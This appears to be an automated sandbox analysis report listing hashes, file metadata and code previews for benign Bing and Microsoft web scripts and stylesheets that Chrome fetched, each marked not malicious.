                                                                            SHA-256:5BC502C29B274DBCEC1A0FB1840AE397BF6B8D0E8310FFAD628331D92A33CD67
                                                                            SHA-512:2C7BD4C070C75E9757E674C3ECE1CBBBFFF5E3D2A4B414902CD1857DDC762269605005C531E73F363C7FE73FF82D30F2D910A8E6060CD11225179C14B52FCBAF
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://r.bing.com/rp/Eu8GG4Zlg6d7hkyQw7bD7Gqlch0.js
                                                                            Preview:var BingAtWork;(function(n){var t;(function(){function h(){var t=f.value;/\S/.test(t)&&n()}function c(t){var i=t[0],r=t[1],u=t[2];n()}function l(n){var t=n&&n.length>1&&n[1];t&&Lib.CssClass.contains(t,"b_searchbox")&&t.id!=s&&a()}function a(){Lib.CssClass.add(sj_b,u)}function n(){Lib.CssClass.remove(sj_b,u)}function v(){sj_evt.bind("autosuggestHide",c,!0);sj_evt.bind("focusChange",l,!0);t&&sj_be(t,"submit",h)}function i(){(n(),r)||(t=_ge(e),f=_ge(o),r=!0,v())}var r=!1,u="as_on",e="sb_form",o="sb_form_q",s="uaseabox",t,f;sj_be(_d,"DOMContentLoaded",i);sj_evt.bind("onP1",i,!0);sj_evt.bind("ajax.load",i,!0);sj_evt.bind("pagehide",n);sj_evt.bind("ajax.unload",n)})(t=n.HeaderWithAutoSuggestState||(n.HeaderWithAutoSuggestState={}))})(BingAtWork||(BingAtWork={}))
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (606), with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):606
                                                                            Entropy (8bit):5.268639530160161
                                                                            Encrypted:false
                                                                            SSDEEP:12:hc2AcBdEcv2Csu+IUhIlaq1YkOcAwI98NyeTgy8XTQHY2:hc2AcBSBZacr98XSDuY2
                                                                            MD5:0C2672DC05A52FBFB8E3BC70271619C2
                                                                            SHA1:9EDE9AD59479DB4BADB0BA19992620C3174E3E02
                                                                            SHA-256:54722CF65AB74A85441A039480691610DF079E6DD3316C452667EFE4A94FFD39
                                                                            SHA-512:DD2B3E4438A9DEAA6B306CBC0A50A035D9FE19C6180BC49D2A9D8CDBB2E25D9C6C8C5265C640AC362DC353169727F8C26503E11A8A061A2517A303F61D0CCD3C
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview:var sj_rra=function(n){var i="/rewardsapp/reportActivity",f=_w.location.search.substring(1),u=window.data_iid,r,t,e;i+=u&&u.length>0?"?IG="+_G.IG+"&IID="+u+"&"+f:"?"+f;r=window.rw_mqs_cg;r&&r.length>0&&(i+="&cg="+r,window.rw_mqs_cg=undefined);_w._H&&_w._H.mkt&&(i+="&src=hp");t=sj_gx();e="url="+escape(n)+"&V=web";t.open("POST",i,!0);t.setRequestHeader("Content-type","application/x-www-form-urlencoded");t.onreadystatechange=function(){t&&t.readyState==4&&t.status==200&&t.responseText&&_w.sj_appHTML&&(sj_appHTML(document.body,t.responseText),sj_evt&&sj_evt.fire("serpThemeUpdatedByRewards"))};t.send(e)}
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (684), with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):684
                                                                            Entropy (8bit):5.166363591063823
                                                                            Encrypted:false
                                                                            SSDEEP:12:2Q12lkSF3mVwl/BJWhuSpOYkM3+Pu1w2E1fNPrQ5uj5lD+QgAjTYCXPrQuN:2Q1QkSFr5BJupODpfPrQ8Dn/XPrQuN
                                                                            MD5:C1D04951E98B892931D4C2BC34555057
                                                                            SHA1:55E6297F3499B4961C8E956F7F088868CD59C769
                                                                            SHA-256:7C317940549467B3210D2F72DA000BAC3481ABFDE3AC5358D398EB64DCBC8532
                                                                            SHA-512:D427487C00AF5E8D9DB222F8A01521A5C8646AE8E459D517443DAC8EF2DBEC2DDEA91877B095B82CF3E52031E1650C7360811ED8A06E02F85E3517974D36AD96
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview:(function(){var n,i=(new Date).getTime(),t=_G!==undefined&&_G.RTO!==undefined?_G.RTO:null,r=((n=_G===null||_G===void 0?void 0:_G.EF)===null||n===void 0?void 0:n.infrefcflog)===1;t!=null&&(window.history.scrollRestoration="auto",document.addEventListener("visibilitychange",function(){if(document.visibilityState==="visible"&&window.location.href.indexOf("/search")>=0&&(new Date).getTime()-i>t&&(Log&&Log.Log&&Log.Log("NTRef","DayRefresh","Active"),!r)){var n=window.location.href+(window.location.href.indexOf("dayref=1")<0?"&dayref=1":"");window.location.href=n}}),typeof setTimeout!="undefined"&&setTimeout(function(){Log&&Log.Log&&Log.Log("NTRef","DayRefresh","Inactive")},t))})()
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (34732), with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):34732
                                                                            Entropy (8bit):5.452487645923916
                                                                            Encrypted:false
                                                                            SSDEEP:768:+J0AmB7aPmB7aU1THyBVyD3NSrGyDQS+mZvUhM/4S8SrmB:+aaUaJCDA3DjHZv37n6
                                                                            MD5:E4FB9B839186660B1F729B8DF8C994B4
                                                                            SHA1:931792CD70CED4AD586F6329C30C294EBEA1548E
                                                                            SHA-256:6838611C8AB6539005E11C84CA308158F89A51DB57A62CAF21FAAB48BF576177
                                                                            SHA-512:625436BB52CBD7DF7ED03BE05FEA52C5D54B6CC15037D70C268D9598E648A22246DB902B9C6F097BA8B18BD924F6AB17120736285D54DCE13773237F1669853A
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://r.bing.com/rp/kxeSzXDO1K1Yb2MpwwwpTr6hVI4.js
                                                                            Preview:var ModernRewards;(function(n){var t="redDotDisplay",e="redDotDisplayFill",f="rewards_header_icon serp",o="rewards_header_icon hp",s="/red-dot-24.png",h="AutoOpenFlyoutFired",c="bfbNotificationShown",l="BNPNotificationShown",a="ChatVerticalShown",v="CookieDisabled",y="IsAADUser",p="MissingModel",w="_RwBf",b="rwmrst",i=!0,u="",r="//az15297.vo.msecnd.net/images/rewards/membercenter/missions/redDotImage.png",k=function(){function n(n){this.reportActivityModel=n;this.rewardsReadyEventArgs={isAuthenticated:n&&n.IsAuthenticated,isRebatesUser:n&&n.RewardsSessionData&&n.RewardsSessionData.IsRebatesUser,isRewardsUser:n&&n.RewardsSessionData&&n.RewardsSessionData.IsRewardUser,isTrialUser:n&&n.RewardsSessionData&&!n.RewardsSessionData.IsRewardUser&&n.RewardsSessionData.IsTrialUser,waitlist:n&&n.RewardsSessionData&&n.RewardsSessionData.Waitlist,isCcpEligible:n&&n.RewardsSessionData&&n.RewardsSessionData.IsCcpEligible,hasUsedCcpTrial:n&&n.RewardsSessionData&&n.RewardsSessionData.HasUsedCcpTrial}}re
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):208
                                                                            Entropy (8bit):5.168574997359601
                                                                            Encrypted:false
                                                                            SSDEEP:6:2LGXTM3LVjJLVFl1TJc5qpjn6rI4AGBs+HV:2QMLVrhO5qhNNv+1
                                                                            MD5:A6F3B2A6EB5C698A83357F249E73D3A9
                                                                            SHA1:5C97EF08EEAEA712F711170E4F85A2E8DA864427
                                                                            SHA-256:0428A936E0137D674E2050C7ADDD6DDE4CFEC14F8EE849570FFEEE19410CEA2C
                                                                            SHA-512:BD262892D3AACBF37D83BCCC50C2C3563E3AA0569363CCD95A4A778A49AA139E241D005D66EE9B822B6B592033D2656B80B532CDC4CA2911E381E80D0368392B
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://r.bing.com/rp/XJfvCO6upxL3ERcOT4Wi6NqGRCc.js
                                                                            Preview:(function(){function i(t){n&&(n.value==null||n.value.length==0)&&(t.preventDefault(),_w.open("/images/feed?FORM=STIVH0","_blank"))}var n=_ge("sb_form_q"),t=_ge("b-scopeListItem-images");sj_be(t,"click",i)})()
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):200
                                                                            Entropy (8bit):4.806038649841674
                                                                            Encrypted:false
                                                                            SSDEEP:3:qbogfTop3n+4MGaoW4HaWXDQrm/EA3NIpKONc+jACM3HlKBGavyxRNV+bo3oZZ7n:qjop3+BfrmsA3NIpltA3HlKBpoin7n
                                                                            MD5:8CF13351D20909508A6EF0E9D0BDD402
                                                                            SHA1:5B982CDDD68B02F4061F2F4D1E92E743A42791F5
                                                                            SHA-256:8BA5344E1CBB2DB11B70CE22944FDB5A65083E327114078D2FFAA827B5459AF2
                                                                            SHA-512:8C493DD64D07C5046D2EF3D4AE446F29F3447F354B79CFD8907B5BFDDA1871E996B4C518DC891FD20FD5C6F1AD3277F14B5F744965D0C7DC2345908ECBC7477E
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview:var SWRM;(function(n){!n.Unregister||"Notification"in _w&&Notification.permission==="granted"||(n.Unregister(),Log.Log("SWRM","Unregister","Notification permission is not granted"))})(SWRM||(SWRM={}))
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (1321), with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):1321
                                                                            Entropy (8bit):4.948297267822164
                                                                            Encrypted:false
                                                                            SSDEEP:24:Vtga59Ve6cD0ne85NBfDVWkoCy4X2+KPj/JfN5g8Hg4rgox:Vtzfed4nlRjFbaJpD
                                                                            MD5:EB5842EF6A0A735F0FABFFC4892D9EB5
                                                                            SHA1:D919B2960334ECF153020078CFF2D93131481ECE
                                                                            SHA-256:09948484BB8874F0E2D5D8E57084275A4B4EB99091483330CF360F39DD48261A
                                                                            SHA-512:84C8B4E79CA6D67D38A164905B081B798A79CE58066E21079105901E8494D364673BDBA3021B5816161847F80FCC7B3AED34773ECA515792CBE97CB45A562633
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://r.bing.com/rp/2RmylgM07PFTAgB4z_LZMTFIHs4.css
                                                                            Preview:.b_algo{position:relative}#b_results .b_algo .b_tpcn{border-bottom:none;padding:0 0;margin:0 0;display:flex;position:relative}.b_algo .b_tpcn>.tilk,.b_algo .b_tpcn strong>.tilk{padding-bottom:4px}.b_algo .b_tpcn .tpic{display:flex;height:38px;flex-direction:row;align-items:center;margin-right:8px}#b_results .b_algo .b_tpcn .b_attribution{padding-bottom:0;padding-top:0;margin-top:0;height:20px;line-height:20px;font-size:13px;display:flex}#b_results .b_algo .tpic .wr_fav{width:26px;height:26px;text-align:center;border:1px solid #ececec;background-color:#f5f5f5;border-radius:50%;display:flex;align-items:center;justify-content:center;margin-right:0}.b_tpcn .tptt{height:18px;padding-bottom:0;line-height:18px;font-size:14px;color:#111}#b_results .b_tpcn .b_attribution{line-height:20px}.b_tpcn .b_attribution cite,.b_tpcn .b_attribution .c_tlbxTrg{color:#111}#b_results .b_algo .gb_lnk:hover{text-decoration:none}.tpmeta{display:flex}#b_results .tpmeta .b_rebateSlug .algoSlug_icon,#b_results .tp
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (2667), with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):2667
                                                                            Entropy (8bit):5.1731531628165826
                                                                            Encrypted:false
                                                                            SSDEEP:48:z9NqvTeIMIXiRxiIQ8gldgj0AEd8KjVi/dpu/cHoRmA9lkhWDoM:BNqymiRxiIQ3lis8eY1gcHKCi
                                                                            MD5:BDCA3999DD520E44CDD8723D0332AF3A
                                                                            SHA1:8D1A4F6FDC80F4F88BD2AAE4127602855CA9EFC2
                                                                            SHA-256:AB9C7F5BC90579A6876E4DD42C96343DDE656E31D7EFB87B34565295BA146D3A
                                                                            SHA-512:50F5205828410D65C38C6A255CAEB87A60EF879E60CABD970B3FBB65333EA1C3586D2AD1232BD886FAE1272B07A9335A83D7D2190B42EAC58DDDB13CDC25898A
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://r.bing.com/rp/jRpPb9yA9PiL0qrkEnYChVyp78I.js
                                                                            Preview:var ClickBackUtility;(function(n){function e(){var n="sschk",t="sschv",i;try{if(typeof Storage=="undefined"||typeof sessionStorage=="undefined"||(sessionStorage.setItem(n,t),i=sessionStorage.getItem(n),sessionStorage.removeItem(n),i!=t))return!1}catch(r){return!1}return!0}function o(){var t,n,i,r;return!!(((t=_w===null||_w===void 0?void 0:_w.performance)===null||t===void 0?void 0:t.navigation)||((r=(i=(n=_w===null||_w===void 0?void 0:_w.performance)===null||n===void 0?void 0:n.getEntriesByType)===null||i===void 0?void 0:i.call(n,"navigation"))===null||r===void 0?void 0:r.length)>0)}function s(){var n,t,i,r,u;return"performance"in _w&&(((r=(i=(t=(n=_w.performance)===null||n===void 0?void 0:n.getEntriesByType)===null||t===void 0?void 0:t.call(n,"navigation"))===null||i===void 0?void 0:i[0])===null||r===void 0?void 0:r.type)==="back_forward"||((u=_w.performance.navigation)===null||u===void 0?void 0:u.type)&&_w.performance.navigation.type===_w.performance.navigation.TYPE_BACK_FORWARD)}func
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (546), with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):546
                                                                            Entropy (8bit):5.0165945166912636
                                                                            Encrypted:false
                                                                            SSDEEP:12:NY3Ql7RF6VwKKvjFO/47Uxkw7BPxDRRz4j1L7KTfMM:igl7REVwKKy47Uxn7BpRRIl7KTF
                                                                            MD5:C04FF9174AE73DC28DB8A8E4AEC5AEAA
                                                                            SHA1:31A8790654C9012E24574C8D3496743CD355A6E2
                                                                            SHA-256:FD5483AD8CC2E5851B4D4F1826B693B21129352D41AB1A4A15E6D5FE938B95E1
                                                                            SHA-512:281F347FE3EE2699ACECC272DB7AC4E8ED5F0E6580A5A9DFDBA5A2B5221AB43C0889A29ED0F57F9B5CBE24817A6989D52403C90E6E76888DBBA87615ED86CF08
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview:var LogAccessibilityEvents;(function(){function t(){sj_be(_w,"keydown",function(t){n&&t.target==n&&Log.LogFilterFlare&&Log.LogFilterFlare(["screenreader"])})}function i(){var n=matchMedia("(forced-colors: active)"),t=matchMedia("(prefers-color-scheme: dark)");n.matches&&Log.LogFilterFlare&&Log.LogFilterFlare(["highcontrast"]);t.matches&&Log.LogFilterFlare&&Log.LogFilterFlare(["colschemedark"])}var n=document.getElementById("b_skip_to_content");typeof Log!="undefined"&&Log.Log&&(i(),t())})(LogAccessibilityEvents||(LogAccessibilityEvents={}))
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (943), with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):943
                                                                            Entropy (8bit):5.052216481230544
                                                                            Encrypted:false
                                                                            SSDEEP:24:IP6tZxSrXtQqEtZxYtmBUFnIwbodnJd1TjcJCGpgGxyxDm7dY:VxSrSqExRUlbIFjGrDxyxIY
                                                                            MD5:72AE885A649FCA2170FE04078DF87FB6
                                                                            SHA1:BC394CB6982249B626FB0D4B0DF7B73E95B8CCEA
                                                                            SHA-256:0E9E10EDC02C89271C2F1216C8BBE962EF6CBF2E25F2364BD89F3A5BDC7FEFA1
                                                                            SHA-512:8D93461751A33A116B82BF506E99044BE98B1C4293C06DDA660478A4A8BA62186F396EB3628562426F62628358827FD70B9FD31691548BE7993FCE5CD87AC1A9
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://r.bing.com/rp/vDlMtpgiSbYm-w1LDfe3PpW4zOo.css
                                                                            Preview:.sw_close{display:inline-block;position:relative;overflow:hidden;direction:ltr;height:12px;width:12px}.sw_close:after{display:inline-block;transform:scale(.5);transform-origin:-218px -40px}.sw_meIc,.sw_spd,.idp_ham,.idp_wlid{position:relative;overflow:hidden;direction:ltr}.sw_meIc:after,.idp_ham:after,.idp_wlid:after{position:relative;transform:scale(.5);display:inline-block}.idp_ham{height:14px;width:20px;vertical-align:top;top:17px}.idp_ham:focus{outline-style:solid;outline-offset:5px}.idp_ham:after{transform-origin:-274px -40px}.idp_ham:hover:after,.idp_ham:active:after,.idp_ham:focus:after{transform-origin:-318px -40px}.idp_wlid,.sw_meIc{height:18px;width:18px}.idp_wlid:after{transform-origin:-48px 0}.rh_reedm .sw_meIc:after{transform-origin:-94px 0}.sw_meIc:after{transform-origin:-58px 0}.sw_spd:after{transform-origin:-362px -28px}.sw_meIc:after,.idp_ham:after,.idp_wlid:after{content:url(/rp/kAwiv9gc4HPfHSU3xUQp2Xqm5wA.png)}
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (674), with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):674
                                                                            Entropy (8bit):5.239693493116514
                                                                            Encrypted:false
                                                                            SSDEEP:12:GyX+fnReu8VliHMtm5vXuMp4CWhneMNqOgqpsRWc9mMCDBMw0n:GS4Reu+kSkNCnvVgqSRWzAn
                                                                            MD5:8D078E26C28E9C85885F8A362CB80DB9
                                                                            SHA1:F486B2745E4637D881422D38C7780C041618168A
                                                                            SHA-256:0BF9F3AD9CDBBC4D37C8B9E22DD06CC26EEA12A27EF6C0F95DB6CBE930177461
                                                                            SHA-512:B808A972CD44E6BDA01AC1F8D904D5A281F33B9238B8CAAB03DECB6ADB6B494B19DD9BB35E3D1EA3CA914FF4957155F6D2CB5A9B3A00C2195F80F52804FFB244
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://r.bing.com/rp/9IaydF5GN9iBQi04x3gMBBYYFoo.js
                                                                            Preview:var LinksColorOnMD;(function(n){function i(n){while(n&&n.nodeName!=="A")n=n.parentElement;return n}function o(n){if(n.button===0&&!n.ctrlKey&&!n.shiftKey){var f=i(sj_et(n));f&&(Lib.CssClass.add(f,t),r[f.href]=sb_st(function(){u(f)},5e3))}}function u(n){Lib.CssClass.remove(n,t)}function s(n){h(n);var r=i(sj_et(n));r&&Lib.CssClass.remove(r,t)}function h(n){var t=i(sj_et(n)),f;t&&(f=r[t.href],f&&sb_ct(f),e&&u(t))}function f(){for(var n,i=_d.getElementsByTagName("A"),t=0;t<i.length;t++)(n=i[t],n)&&(sj_be(n,"mousedown",o),sj_be(n,"click",s))}var t="b_LinksColorMD",r={},e=sj_cook&&sj_cook.get("SRCHHPGUSR","NEWWND")==="1";n.bind=f;f()})(LinksColorOnMD||(LinksColorOnMD={}))
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):257
                                                                            Entropy (8bit):5.012208451915229
                                                                            Encrypted:false
                                                                            SSDEEP:6:qAdwhhN48IIRnXe7fSAsDDlL72AW5zAH1a2si6gfR+rMZRUZNn:z0/4ZGXeviRfmzS+i6TrgRUTn
                                                                            MD5:F4995A452A1152DBE4CB468DFD0B5331
                                                                            SHA1:1686C393D11997201FCDA1C5C626E3F81839A3CE
                                                                            SHA-256:7EDFDDDF8032CBFF4286CB3AE77E68F478485BD96CBFC0C8A84852415E10A25C
                                                                            SHA-512:CC141089F2E4009B279EB320162000AC705918B7BF548A68062A3B3EA337B502CB5658354F6541E2325B2A1184C8B380C46BA152FD76D9E5DA315FB5DC4BC21D
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview:var sch=sch||{};(function(){var n="click";sj_evt.bind("onP1",function(){setTimeout(function(){var i=_ge("id_h"),t=_ge("id_sc");i&&t&&(sj_jb("Blue/HamburgerServicesHeaderFlyout_c",0,i,"mouseover",t,n,t,"focus"),sj_be(t,n,function(n){sch.clk=n}))},50)},1)})()
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (321), with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):321
                                                                            Entropy (8bit):5.359484461172198
                                                                            Encrypted:false
                                                                            SSDEEP:6:q0DvMPPb+jF+t2rS95gW/IVKUx8d4A1q1LdEWPrACun:nmPb78tW/+Krd4zEwUn
                                                                            MD5:F2E9C49BDE80A584AAC65A19B0D92CF1
                                                                            SHA1:AF40E39321557749551BE024AF218BCE747427D3
                                                                            SHA-256:EB6721D635DA2BA960FFF0D2F4CDA9973B76667AEEB19C2495DD28E0E4F927D7
                                                                            SHA-512:712EA928A8F6F7C3D3BFA8FD7E1D85EC030F06EAF986602246BB9423054E3AC8F48F2FAF2315AABA95442C8DB3DE73BBEBC85A53867476CB42DC32829853A328
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview:var NewTabOptout;(function(n){function t(n){sj_evt.bind("ntf_newtabfiltoggled",function(t){sj_cook.set("SRCHHPGUSR","EXLKNT",t[1]?"1":"0");n&&_w.location.reload()});var t=sj_cook.get("SRCHHPGUSR","EXLTT"),i=t?parseInt(t)+1:1;sj_cook.set("SRCHHPGUSR","EXLTT",i.toString())}n.NewTabInit=t})(NewTabOptout||(NewTabOptout={}))
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (559), with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):559
                                                                            Entropy (8bit):5.161037890677564
                                                                            Encrypted:false
                                                                            SSDEEP:12:hN404b2CZppR0uujuRWBMLvguNzmxgIbPp0wH9MIBmBZNXIZyk4n:hIZpn3RWBMDgupxI5fBmBZNXIZybn
                                                                            MD5:E8A5707D6AE6DD7E93EA8C3A23DBA987
                                                                            SHA1:A71CDF8C52235930D08A4874039693FDC82E6327
                                                                            SHA-256:543F13A90187BEB6441890F93979F00B8EFAC566716C71D465EE731BA21B7D26
                                                                            SHA-512:79FD0EA1CF0B0CA67AC7EEC0CB6EA684D6CCB6243957ADDA88D95FC3A21997B7A07A0156D87447DA3C5165C198388404F72D9D41CB335955071E4692C332A0BB
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://r.bing.com/rs/6r/lz/nj/pxzfjFIjWTDQikh0A5aT_cguYyc.js?or=w
                                                                            Preview:var sj_appHTML=function(n,t){var f,e,o,r,i,s,h;if(t&&n){var c="innerHTML",l="script",a="appendChild",v="length",y="src",p=sj_ce,u=p("div");if(u[c]="<br>"+t,f=u.childNodes,u.removeChild(f[0]),e=u.getElementsByTagName(l),e)for(o=0;o<e[v];o++)r=p(l),i=e[o],i&&(r.type=i.type=="module"||i.type=="importmap"?i.type:"text/javascript",s=i.getAttribute(y),s?(r.setAttribute(y,s),r.setAttribute("crossorigin","anonymous")):(r.text=i[c],r.setAttribute("data-bing-script","1")),i.parentNode.replaceChild(r,i));for(h=_d.createDocumentFragment();f[v];)h[a](f[0]);n[a](h)}}
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (2372), with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):2372
                                                                            Entropy (8bit):5.399271608314148
                                                                            Encrypted:false
                                                                            SSDEEP:48:cy5olPjLyYu2BoiD/O7TivxkdxqyGzCtws103e7w74NTIyUAJxUwqaYFCBAKKkeK:Xq5hz9jqxqyGzCCsqO8EJITJI
                                                                            MD5:D09010918ED87EAFE75A6C5B53D0995F
                                                                            SHA1:0425E78B4037F2F6E980B04872EB911CFC529F63
                                                                            SHA-256:41D5F9C642CAF78783C89602AC666ECFF5FA3AFC012EF2C3F1610ED565853D4B
                                                                            SHA-512:5F43334CD3F6830CB29AA2ACA5F59CDD000EAD7EA4C272184B67DB2A4A35B64E66ECA36176268D2FAE726C737E28407622036F2C955A6E95EE9269E8C8E9F5C0
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview:var InsertAdsFramework;(function(n){function y(n){var i=_ge("b_results"),r;i&&a&&(t=i.querySelectorAll(".b_algo"),t.length!=0)&&(h=n,r=ClickBackUtility.isHiddenEventSupported(s),typeof _w!="undefined"&&r&&sj_be(_d,s.visibilityChangedEventName,function(){_d.visibilityState==="visible"&&c("1")}),typeof _w!="undefined"&&ClickBackUtility.isPerformanceNavigationSupported()&&ClickBackUtility.isClickback()&&c("2"),p(),sj_evt.fire("insertads_init"))}function c(n){var f,i,r,e,s;(u("TP",n),f=sessionStorage.getItem(o),f)&&(i=f.split("_"),i.length==3)&&((r=i[1],i[0]!=_G.IG||parseInt(r)>=t.length)||(e=(new Date).getTime(),s=parseInt(i[2]),e-s<v)||(u("Ads","True"),typeof _G=="undefined"||_G.EF===undefined||_G.EF.clickbackadscflog===undefined||_G.EF.clickbackadscflog!==1)&&w(t[r],r))}function p(){for(var i=function(n){var u=t[n],i=u.querySelectorAll(e),r;if(i&&i.length>0)for(r=0;r<i.length;r++)sj_be(i[r],"click",function(){sessionStorage.setItem(o,_G.IG+"_"+n+"_"+(new Date).getTime())})},n=0;n<t.leng
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (65446), with CRLF line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):97766
                                                                            Entropy (8bit):4.985286324195439
                                                                            Encrypted:false
                                                                            SSDEEP:1536:u7/cnTfIbdDSRjlJTQPWVTagPShkMnJuxlk6WRIvQEtUK9G2CWKeYcftIougRuOE:uLd2oe9G2CWPtmK4Y3OFnG7KoO
                                                                            MD5:E6A3E321E073431B1A5075072B24D636
                                                                            SHA1:5BA55B152BD8E479B90D83AE90804FDD0D47C216
                                                                            SHA-256:62A4AFC08A7785A574EDABD49DAAB6E26B978FE836794C2D06516EEB6780C64A
                                                                            SHA-512:E52737232D26A92613936DC7F5A54261C940EFF2E8C24B5E9680C2E929304E950D0EC8A375FD3D15317236C6A56F4BD02E47836BEF35FB5AF3DA234D45D91F2D
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://answers-afd.microsoft.com/static/js/lib/jquery/jquery-3.6.0.min.js
                                                                            Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */..!function (e, t) { "use strict"; "object" == typeof module && "object" == typeof module.exports ? module.exports = e.document ? t(e, !0) : function (e) { if (!e.document) throw new Error("jQuery requires a window with a document"); return t(e) } : t(e) }("undefined" != typeof window ? window : this, function (C, e) { "use strict"; var t = [], r = Object.getPrototypeOf, s = t.slice, g = t.flat ? function (e) { return t.flat.call(e) } : function (e) { return t.concat.apply([], e) }, u = t.push, i = t.indexOf, n = {}, o = n.toString, v = n.hasOwnProperty, a = v.toString, l = a.call(Object), y = {}, m = function (e) { return "function" == typeof e && "number" != typeof e.nodeType && "function" != typeof e.item }, x = function (e) { return null != e && e === e.window }, E = C.document, c = { type: !0, src: !0, nonce: !0, noModule: !0 }; function b(e, t, n) { var r, i, o = (n = n || E).createElement("sc
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):25
                                                                            Entropy (8bit):4.1834651896016455
                                                                            Encrypted:false
                                                                            SSDEEP:3:+SsGOTgY:+TGPY
                                                                            MD5:516E0CBF4CB3B9319A759AE1D4FCE40E
                                                                            SHA1:83B1CAA3477936368A4D06CA57BE6320A20000C4
                                                                            SHA-256:19739FAF9584E91AD8FB45394A5B12D3BA8E8FC08CE02E940A425B699A680F47
                                                                            SHA-512:2D038368A55D5B0F3C5605BD6BF80790FF22567A86D42A8540CF461B3C4BA0A945BC0335404F9CCC311399CE1A4EFCA051D3F11BF466A27829A188ADE08FC3FD
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://r.bing.com/rp/g7HKo0d5NjaKTQbKV75jIKIAAMQ.css
                                                                            Preview:p>.news_dt{color:#767676}
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (1655), with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):1655
                                                                            Entropy (8bit):5.16138478309247
                                                                            Encrypted:false
                                                                            SSDEEP:48:2M0hri9qCEVmyVmavVzNP2A2a2nWTEMhO6xLSNk6rG6dfIqM:2M0hri9BEVmyVma1QlrnWTEIxMzrddf4
                                                                            MD5:3273D33D1FE10F18F9A6ED81C3A30A6B
                                                                            SHA1:7CADC6F814B6EBCFC85B9F87C31B07E040CBE23B
                                                                            SHA-256:AC10BCFEEAAA3746CE1A36B416339479940DC1BF5A1E798E22C40C31F3C67176
                                                                            SHA-512:E4AB7AE15CAAA753FF776B08B45CEB6AB5F8F053232EB212D1EE8DA764ADB34F2E1A18EA6C6902C25EDD12D2414C078FF0E8BC3831A178DBAE060E74AD2D90EE
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            URL:https://r.bing.com/rp/fK3G-BS268_IW5-HwxsH4EDL4js.css
